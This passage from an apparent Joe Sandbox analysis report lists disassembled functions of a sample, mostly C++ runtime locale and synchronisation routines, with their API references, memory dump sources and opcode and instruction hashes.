                                                                                                                                                            • Opcode Fuzzy Hash: 1f91699d3e2973d45411005edf02c51e353277c2ba33d15c41a3ddac865fd465
                                                                                                                                                            • Instruction Fuzzy Hash: 5C01AD35900119DBCB05AB668865BBE77B1BF84B24F24080FE5016B391DF7C9E059BA9
                                                                                                                                                            Function 004D2CDF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2CE6
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2CF0
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2D41
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2D61
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: 26efd578ec88e859203dab1bfa4ea20d2f1f920847fa0cb3aa46b96344c1e799
                                                                                                                                                            • Instruction ID: 861ab9bfb8a1cc972c53e0de6b6210f8d5d09d3498abe850d689beb07e59fc57
                                                                                                                                                            • Opcode Fuzzy Hash: 26efd578ec88e859203dab1bfa4ea20d2f1f920847fa0cb3aa46b96344c1e799
                                                                                                                                                            • Instruction Fuzzy Hash: 2D01ED358002199FCB15EB619815BBE77B1BF94714F24050FE5106B392CFB89E018BA9
                                                                                                                                                            Function 004D2E09 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2E10
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2E1A
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2E6B
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2E8B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: a665ecb7c79970f0793e062d8040af8a3be247f9174ff31f301e1c4d715daee6
                                                                                                                                                            • Instruction ID: 54c1264a042091559cd38d8f0f2967c46335b289a7bb4952346e306d86043bbe
                                                                                                                                                            • Opcode Fuzzy Hash: a665ecb7c79970f0793e062d8040af8a3be247f9174ff31f301e1c4d715daee6
                                                                                                                                                            • Instruction Fuzzy Hash: AE010036800129DBCB01EB61C815BBEB7B0BFA4714F24080FE50067391CF789E058BA9
                                                                                                                                                            Function 004D2E9E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2EA5
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2EAF
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2F00
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2F20
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: b97266248c5b9dec33ed0bba47bf77fffe0eb8596cde54d178fddda2612fdda7
                                                                                                                                                            • Instruction ID: 850111f855ba302313cf9c7fe9d87344acb34baffe9748f412c98d6bb83af071
                                                                                                                                                            • Opcode Fuzzy Hash: b97266248c5b9dec33ed0bba47bf77fffe0eb8596cde54d178fddda2612fdda7
                                                                                                                                                            • Instruction Fuzzy Hash: 0301C035900229ABCB05EB61D915BBE77B0BF94714F24084FF500A7391CF789E05DBA9
                                                                                                                                                            Function 004D2F33 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2F3A
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2F44
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2F95
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2FB5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: 042f8ccd017c29c2901d6a8dfd52ccd5a236f134a1c5e38ae75fa7da8166cc45
                                                                                                                                                            • Instruction ID: f6fbf3966a5b373e76a3956c98d672b101a27fd1b973b61585b9aa54a177c1fc
                                                                                                                                                            • Opcode Fuzzy Hash: 042f8ccd017c29c2901d6a8dfd52ccd5a236f134a1c5e38ae75fa7da8166cc45
                                                                                                                                                            • Instruction Fuzzy Hash: 2301D235900119EBCB05EB61C925BBEB7B1BFA4714F24484FF410A7391DFB89E019BA9
                                                                                                                                                            Function 004E2D20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • SleepConditionVariableCS.KERNELBASE(?,004E2CBD,00000064), ref: 004E2D43
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(0051DD3C,?,?,004E2CBD,00000064,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2D4D
                                                                                                                                                            • WaitForSingleObjectEx.KERNEL32(?,00000000,?,004E2CBD,00000064,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2D5E
                                                                                                                                                            • EnterCriticalSection.KERNEL32(0051DD3C,?,004E2CBD,00000064,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2D65
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 3269011525-2395104290
                                                                                                                                                            • Opcode ID: fbbd8caefe4af87bad38a34a21def7925e1b4dc91713692ba654c62712279da0
                                                                                                                                                            • Instruction ID: 559e839bc4859b918a9c43d6c96300b69d5bcccd96abbeae6aa48fc9c7055857
                                                                                                                                                            • Opcode Fuzzy Hash: fbbd8caefe4af87bad38a34a21def7925e1b4dc91713692ba654c62712279da0
                                                                                                                                                            • Instruction Fuzzy Hash: E7E0D832A05528BBDB122B41FC08ECE3F39FF1CB51B000011FE0566171C7646945ABF5
                                                                                                                                                            Function 004F6DB9 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004F6E40
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004F6F01
                                                                                                                                                            • __freea.LIBCMT ref: 004F6F68
                                                                                                                                                              • Part of subcall function 004F5BDC: HeapAlloc.KERNEL32(00000000,00000000,A8O,?,004F543A,?,00000000,?,004E6CE7,00000000,A8O,00000000,?,?,?,004F363B), ref: 004F5C0E
                                                                                                                                                            • __freea.LIBCMT ref: 004F6F7D
                                                                                                                                                            • __freea.LIBCMT ref: 004F6F8D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1096550386-0
                                                                                                                                                            • Opcode ID: c81bfd71e39bf3b261fb04ec65430957ba2e24bdf67487ba4e874d0d1e26c37a
                                                                                                                                                            • Instruction ID: 4c3cda207dd9a383d756c70b711d7ad57644a443f34e59d94f48269b4bbc722c
                                                                                                                                                            • Opcode Fuzzy Hash: c81bfd71e39bf3b261fb04ec65430957ba2e24bdf67487ba4e874d0d1e26c37a
                                                                                                                                                            • Instruction Fuzzy Hash: 4651A17260020EAFEB219FA5DC41DBF3AA9EF04754B16016AFE08D7251E779DC109768
                                                                                                                                                            Function 004CB8B0 Relevance: 7.6, APIs: 5, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004CB8DD
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004CB900
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004CB928
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004CB98D
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004CB9B7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 459529453-0
                                                                                                                                                            • Opcode ID: 332334917aced2864ca1badf32834fbc0ba2b40dfcbaeb3f5a190a755c41d6fd
                                                                                                                                                            • Instruction ID: ede4c5443017ec400260241de2add9a04ba13270321b4d1d2aa1183509530ea2
                                                                                                                                                            • Opcode Fuzzy Hash: 332334917aced2864ca1badf32834fbc0ba2b40dfcbaeb3f5a190a755c41d6fd
                                                                                                                                                            • Instruction Fuzzy Hash: 4A310375800214DFCB10DF54D952BAEBBB4EF20324F14815EE904A73A1D738AD05CBD6
                                                                                                                                                            Function 004D1C42 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Maklocstr$Maklocchr
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2020259771-0
                                                                                                                                                            • Opcode ID: 135f0b5e627df9a966797a84089e3bd44fc78f8d82bd7cc8da471909d5033390
                                                                                                                                                            • Instruction ID: 700a64ca76af1319656b9851a6fd7df7a63b869d92d903496ff30e3ee62403e0
                                                                                                                                                            • Opcode Fuzzy Hash: 135f0b5e627df9a966797a84089e3bd44fc78f8d82bd7cc8da471909d5033390
                                                                                                                                                            • Instruction Fuzzy Hash: 0111BFB1940784BBE720DBA58881F13B7ECAF05714F04051BF9458B751D378FC4087A9
                                                                                                                                                            Function 004CEC87 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 317COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004CEC8E
                                                                                                                                                              • Part of subcall function 004CD87C: __EH_prolog3.LIBCMT ref: 004CD883
                                                                                                                                                              • Part of subcall function 004CD87C: std::_Lockit::_Lockit.LIBCPMT ref: 004CD88D
                                                                                                                                                              • Part of subcall function 004CD87C: std::_Lockit::~_Lockit.LIBCPMT ref: 004CD8FE
                                                                                                                                                            • _Find_elem.LIBCPMT ref: 004CEE8A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                            • String ID: 2N$0123456789ABCDEFabcdef-+Xx
                                                                                                                                                            • API String ID: 2544715827-1734801814
                                                                                                                                                            • Opcode ID: 49a90f7520d4abc5adcd620f23ffefb7ee60a8f8a3e40cd71c8d6e7ac5bf133a
                                                                                                                                                            • Instruction ID: 066e841a07441e3b2a48e330b63a57962d64e316593e63e7b0a1e3829eb5d64f
                                                                                                                                                            • Opcode Fuzzy Hash: 49a90f7520d4abc5adcd620f23ffefb7ee60a8f8a3e40cd71c8d6e7ac5bf133a
                                                                                                                                                            • Instruction Fuzzy Hash: 69C17038E042889EDF61DBA6C550FEDBBB2AF55304F14406FD8856B383C7289D46CB59
                                                                                                                                                            Function 004D62BE Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 316COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004D62C8
                                                                                                                                                              • Part of subcall function 004D2D74: __EH_prolog3.LIBCMT ref: 004D2D7B
                                                                                                                                                              • Part of subcall function 004D2D74: std::_Lockit::_Lockit.LIBCPMT ref: 004D2D85
                                                                                                                                                              • Part of subcall function 004D2D74: std::_Lockit::~_Lockit.LIBCPMT ref: 004D2DF6
                                                                                                                                                            • _Find_elem.LIBCPMT ref: 004D6502
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                            • String ID: 2N$0123456789ABCDEFabcdef-+Xx
                                                                                                                                                            • API String ID: 2544715827-1734801814
                                                                                                                                                            • Opcode ID: 123e1dad9900dbe44bd9ce827c33604280d7216eb3f38ea70d9e69ba93aa99d6
                                                                                                                                                            • Instruction ID: 0a723ca27a774d8d4c1a24ad79b8f5dcb180f85237ccb3be6754795fa42eeab0
                                                                                                                                                            • Opcode Fuzzy Hash: 123e1dad9900dbe44bd9ce827c33604280d7216eb3f38ea70d9e69ba93aa99d6
                                                                                                                                                            • Instruction Fuzzy Hash: 11C19430E042589BDF21DF68D8617ADBBB1BF11308F55409FD889AB386DB389C85CB58
                                                                                                                                                            Function 004D6694 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 316COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004D669E
                                                                                                                                                              • Part of subcall function 004CB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 004CB8DD
                                                                                                                                                              • Part of subcall function 004CB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 004CB900
                                                                                                                                                              • Part of subcall function 004CB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 004CB928
                                                                                                                                                              • Part of subcall function 004CB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 004CB9B7
                                                                                                                                                            • _Find_elem.LIBCPMT ref: 004D68D8
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                            • String ID: 2N$0123456789ABCDEFabcdef-+Xx
                                                                                                                                                            • API String ID: 3042121994-1734801814
                                                                                                                                                            • Opcode ID: bf3e58e4f72b23ef111ce33595cf7edfecff8b842b2535cd818f91b5412d6ab6
                                                                                                                                                            • Instruction ID: 854c201ca5904a5e1af9355fd4ffdcaa889e70c0ca29bd2319f9a5e6cd2b2e22
                                                                                                                                                            • Opcode Fuzzy Hash: bf3e58e4f72b23ef111ce33595cf7edfecff8b842b2535cd818f91b5412d6ab6
                                                                                                                                                            • Instruction Fuzzy Hash: E0C18570E042588BDF11DF64C8617ADBBB2BF11304F55809FE889AB382DB389D85DB59
                                                                                                                                                            Function 004CBB40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000018,C7C71CC4,?,00000000), ref: 004CBBA3
                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 004CBD7F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocConcurrency::cancel_current_taskLocal
                                                                                                                                                            • String ID: false$true
                                                                                                                                                            • API String ID: 3924972193-2658103896
                                                                                                                                                            • Opcode ID: ca151cce7727c0ee323725b4e6b4dc92c4d3ada41e33579f7bfd10ddeedba75d
                                                                                                                                                            • Instruction ID: 7b3b658ea281298bb039935d80ad1e395d6d40f243c9c0f3e877172c4820ea3e
                                                                                                                                                            • Opcode Fuzzy Hash: ca151cce7727c0ee323725b4e6b4dc92c4d3ada41e33579f7bfd10ddeedba75d
                                                                                                                                                            • Instruction Fuzzy Hash: 01617FB1D00748DBDB10CFA4C841B9EBBF4FF14304F14825EE855AB281E779AA44CB95
                                                                                                                                                            Function 004DD4FA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004DD501
                                                                                                                                                            • _swprintf.LIBCMT ref: 004DD573
                                                                                                                                                              • Part of subcall function 004D254E: __EH_prolog3.LIBCMT ref: 004D2555
                                                                                                                                                              • Part of subcall function 004D254E: std::_Lockit::_Lockit.LIBCPMT ref: 004D255F
                                                                                                                                                              • Part of subcall function 004D254E: std::_Lockit::~_Lockit.LIBCPMT ref: 004D25D0
                                                                                                                                                              • Part of subcall function 004D2FC8: __EH_prolog3.LIBCMT ref: 004D2FCF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                                                                                                            • String ID: 2N$%.0Lf
                                                                                                                                                            • API String ID: 3050236999-2843531961
                                                                                                                                                            • Opcode ID: 47a06889251c51c90a23bd3a554357e5d8260d1e64caffc6a2b8463c08631a5b
                                                                                                                                                            • Instruction ID: dc3d84089b4e3a240f23cd7ba135b5935ff104d799707dca1d685804534b3bc0
                                                                                                                                                            • Opcode Fuzzy Hash: 47a06889251c51c90a23bd3a554357e5d8260d1e64caffc6a2b8463c08631a5b
                                                                                                                                                            • Instruction Fuzzy Hash: 48417A71D00209ABCF05DFE0D865AED7BB5FB08304F10444AE846AB395DB399916CF95
                                                                                                                                                            Function 004DD79E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004DD7A5
                                                                                                                                                            • _swprintf.LIBCMT ref: 004DD817
